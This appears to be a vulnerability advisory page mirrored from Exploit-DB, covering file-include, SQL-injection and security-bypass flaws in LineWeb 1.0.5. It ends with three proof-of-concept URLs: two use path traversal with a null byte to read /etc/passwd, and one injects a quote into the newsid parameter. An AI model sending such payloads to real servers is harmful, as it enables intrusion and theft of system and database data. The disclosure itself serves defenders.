header-logo
Suggest Exploit
vendor:
LineWeb
by:
7.5
CVSS
HIGH
Multiple local file-include vulnerabilities, SQL-injection vulnerability, Security-bypass vulnerability
CWE
Product Name: LineWeb
Affected Version From: 1.0.5
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

LineWeb Multiple Remote Vulnerabilities

An attacker can exploit these issues to execute arbitrary local files within the context of the webserver process, obtain sensitive information, compromise the affected application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Update to a patched version of LineWeb.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37613/info

LineWeb is prone to multiple remote vulnerabilities:

- Multiple local file-include vulnerabilities
- An SQL-injection vulnerability
- A security-bypass vulnerability

An attacker can exploit these issues to execute arbitrary local files within the context of the webserver process, obtain sensitive information, compromise the affected application, access or modify data, or exploit latent vulnerabilities in the underlying database.

LineWeb 1.0.5 is vulnerable; other versions may also be affected. 

http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=index.php?op=../../../../../../../etc/passwd%00
http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=index.php?op=../../../../../../../etc/passwd%00
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27